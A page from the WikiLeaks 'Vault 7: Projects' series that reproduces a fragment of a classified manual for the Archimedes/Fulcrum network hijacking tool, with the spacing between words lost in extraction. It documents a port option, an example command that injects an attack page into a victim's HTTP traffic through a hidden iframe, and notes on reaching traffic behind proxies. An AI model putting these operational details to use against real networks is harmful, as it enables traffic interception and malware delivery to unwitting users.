Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
2
particularlyvulnerableto reverseengineeringandanalysis.Debugversionsofthetoolshouldbeusedin
controlledtestenvironmentsonly.
(U) NEWOPTIONS
(S)PORTSPECIFICATION
(S//NF)ThenetworkportthatwillbemonitoredforHTTPtrafficisanOPTIONALparameterthatcanbespecified
ineithertheconfigurationfileoronth ecommandline.IthasadefaultvalueofthestandardHTTPport80.Inthe
configurationfileitshouldbespecifiedas:
PORT=8080
(S//NF)Whenprovid edasacommandlineoptionitmustbetheseventhargum ent(requiringthatvaluesare
providedforanyp reviousoptionalarguments):
[VICTIMMAC][HIJACKMAC][MILLISECONDS][ URL][VERIFY_ROUTE][INJECTION_METHOD][PORT]
Example:
>f32d.exe00:0C:29:BD:34:4500:0c:29:61:d0:d71000http://10.0.0.11/attack.htmlF ALSEHIDDEN_IFRAME8080
Where“8080”istheportspecificationandallp riorargumentsarerequired.
PROXYINJECTION NOTE S
TheprimaryreasonforaddingtheabilitytospecifythenetworkportistotargetHTTPconnectionsthatpass
throughaproxy.DuetothemethodthatArchimedesusestocapturetargetedtraffic,thiswillonlyworkin
networkconfigurationswherethespecifiedproxyisonadifferentsubnet(i.e.traffictotheproxymustpass
throughagatewaydevice).
(C)FIREANDFORGETSUPPORT
(S//NF)FireandForget(v.2)supporthasbeenupdatedtoincludesupportforspecifyingtheportasacommand
lineargumentasdescribedpreviously.
(U)APPLICATIONDEFAULTS
(S//NF)ThedefaultvalueforthePORTconfigurationoptionis80.Thismatchestheoriginalbehaviorofthetool.
(U)TROUBLESHOOTING
(S//NF)ArchimedesandFulcrumonlyinjectintoHTTPrequeststhatreferencetherootofthedocumentdirectory.
Forexample,http://www.test.com/butnothttp://www.test.com/subdir/index.html.Thiscontinuestobetrue
whentargetingproxiednetworkconnections.

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh